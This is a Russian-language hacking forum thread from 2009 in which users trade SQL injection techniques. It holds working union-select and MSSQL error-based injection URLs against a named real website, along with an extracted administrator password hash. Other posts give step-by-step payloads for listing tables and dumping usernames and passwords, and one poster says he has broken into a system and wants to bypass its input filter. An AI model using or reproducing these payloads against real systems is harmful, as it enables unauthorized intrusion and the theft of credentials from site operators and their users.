Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    попробуй 1'%2band%2b'1'='1

    P.s. Если можешь скинь ссылку сюда или в ПМ
     
    2 people like this.
  2. Banifaci!

    Banifaci! New Member

    Joined:
    15 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Узвимости директорий сервера

    Такой вопрос: если ли какие-нибудь реальные сайты, у которых уязвимость листинга директорий и возможность загрузки файла в эти каталоги. Нужен реальный пример.
    Спасибо за помощь.
     
  3. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    86
    Likes Received:
    44
    Reputations:
    6
    Такой интересный вопросег:
    Вот скуль
    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+--+
    version() user() database() не проходит...ну думаю и ладно...наугад проверил..5ая ветка..нашол таблу nuke_users в ней поля username, user_password пытаюсь открыть..ошибка,мысля...табла не в той базе..нашол базу..
    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_schema,4,5,6,7+from+information_schema.%20tables+where+table_name=0x6E756B655F7573657273%20--
    edward_swing_s
    при запросе
    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+from+edward_swing_s.nuke_users+--+
    тоже ошибка....в чём трабла,мож гдето в синькасисе ошибся...подскажите
     
  4. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Фильтруются скобки..

    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,@@version,4,5,6,7--
    Таблица nuke_users - пустая.

    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_rows,4,5,6,7+from+information_schema.tables+where+table_name=0x6E756B655F7573657273--
    Да и вообще, админские юзеры хранятся тут:

    Code:
    http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,aid,4,5,6,7+from+nuke_authors--
    5a4be1fa34e62bb8a6ec6b91d2462f5a:5153
     
    #5264 R1dex, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Как SIPT-ом слать POST запросы ? Я поменял В поле Request Type GET на POST,и стал слать запросы.В итоге,в логах апача они отображаются:

    127.0.0.1 - - [06/Feb/2009:12:26:47 +0200] "POST /'%20%20AND%201=1/* HTTP/1.1" 404 138 "-" "Microsoft URL Control - 6.01.9782"


    Отсюда два вариант: Это либо пост,либо кривой гет )) )
     
  6. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Приветсвую всех!

    Возникли вопросы по MS SQL Injection (в mysql inj вроде более менее понимаю)
    Итак, начнем :)
    1.Нашел я значит ошибку в БД, выдало мне

    Сделал я запрос order+by и насчитал аж 100 колонок :)
    Теперь как же мне посмотреть версию БД, узнать таблицы и посмотреть что в них?
    ЧТо то по статьям не могу догнать (прочитал пока только одну, читаю вторую))

    Спасибо за ответы заранее, + поставлю обязательно!
     
  7. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    версия - 1 or 1=@@version--
    таблици - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('имя таблици'))--
     
    #5267 -m0rgan-, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  8. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Сейчас делаю запрос:
    example.ru/index.asp?id=1'+union+select+table_name+from+information_schema.tables--
    Выдает название первой таблицы, делаю с лимитом:
    example.ru/index.asp?id=1'+union+select+table_name+from+information_schema.tables+limit+1,1--
    Выдает: Line 1: Incorrect syntax near '1'.
    Как победить? :)
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    $p01nt
    Победить лучше прочтением статьи по MSSQL. Там другой синтаксис. Подойдёт любая, можешь почитать эту :
    https://forum.antichat.ru/thread30501.html
     
  10. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Люди,вот такая проблема: Проник в систему,нашёл двиг,на котором крутится сайтец.

    Вот функция движная,двиг не определил:

    Code:
    
      function tep_db_prepare_input($string) {
        if (is_string($string)) {
          return trim(stripslashes($string));
        } elseif (is_array($string)) {
          reset($string);
          while (list($key, $value) = each($string)) {
            $string[$key] = tep_db_prepare_input($value);
          }
          return $string;
        } else {
          return $string;
        }
      }
    
    
    Она удаляет пробелы и обратные слэши,если это строка,а если это массив,то делает то же самое и для каждого элемента массива.Если это НИ то и НИ другое,то не делает НИЧЕГО,т.е. получается,что фильтрацию мы обошли(и саму функцию частично).Передаю такое:

    1+order+by+1 без кавычек.Она мне выдаёт на выходе 2.Почему ? Я так понял,что он определил это как строку,но тогда почему она выполнила такое преобразование ? Пробелов-то нет,и слэшей обратных тем более.Помогите пожалуйста =_=

    ЗЫ: Если передать строку в одинарных или в двойных кавычках,то тогда работает третий блок кода,но я сомневаюсь,что сервер позволит мне так играть(из-за magic_quots_gpc.Пока не проверил,но уверен,что включена).

    Так... Походу,это osCommerce, Open Source E-Commerce Solutions.Не заметил я что-то )))

    http://www.oscommerce.com/

    Ухх,убить бы этот сайт нафиг...
     
    #5270 Велемир, 6 Feb 2009
    Last edited: 6 Feb 2009
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    $p01nt, как сказал jokester, там отличается синтаксис...
    Ты заюзал синтаксис mysql, а для MSSQL нужно по другому:
    www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    Узнаем название первой таблици...
    Для того, чтоб узнать название следующей, нажно составить запрос вида:
    www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('имя полученой таблици'))--
    чтоб следующую :
    www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('имя первой таблици','имя второй таблици'))--
    и так далее...
    Аналогично и с колонками.
     
  12. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    2-m0rgan-, ага, я уже разобрался по статье :)

    Еще раз я, как мне перебрать все данные в колонке если нет поля ID и т.п.
    Т.е. есть только поля:
    USERNAME,USERPASSWORD
    Запрос выглядит след. образом:
    1+or+1=(SELECT+TOP+1+USERNAME+from+DD_Users)--
    Напоминаю, я говорю про mssql inj
     
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    $p01nt,
    http://www.site.ru/index.php?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(USERPASSWORD+as+ nvarchar)+from+DD_Users)--
    Это выведит даные из USERNAME и USERPASSWORD
    А на счет перебора, я хз...возможно там только один юзер...
     
  14. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Дык я уже написал вывод, нужен именно перебор!! Там 100% 860 юзеров :)
    Как же все таки перебрать?
     
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    select username from dd_users where username not in (select top 1(2,3,..,n) username from dd_users)
     
    2 people like this.
  16. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    l1ght, обьясни пожалуйста команду и если можно на моем примере.
     
  17. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    2
    3
    4
    and so on

    /add Велемир, если про:
    видимо модреврайт on)
     
    #5277 l1ght, 6 Feb 2009
    Last edited: 6 Feb 2009
    1 person likes this.
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Никто не поможет чтоли ?
     
  19. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Сформировал запрос под свой url:
    +or+1=(select Email from EmailTable where Email not in (select top 2 Email from EmailTable))--
    выдает:
    Microsoft OLE DB Provider for SQL Server error '80004005'

    Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

    /xxx/xxx.asp, line 156
     
  20. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?
     
Loading...
Thread Status:
Not open for further replies.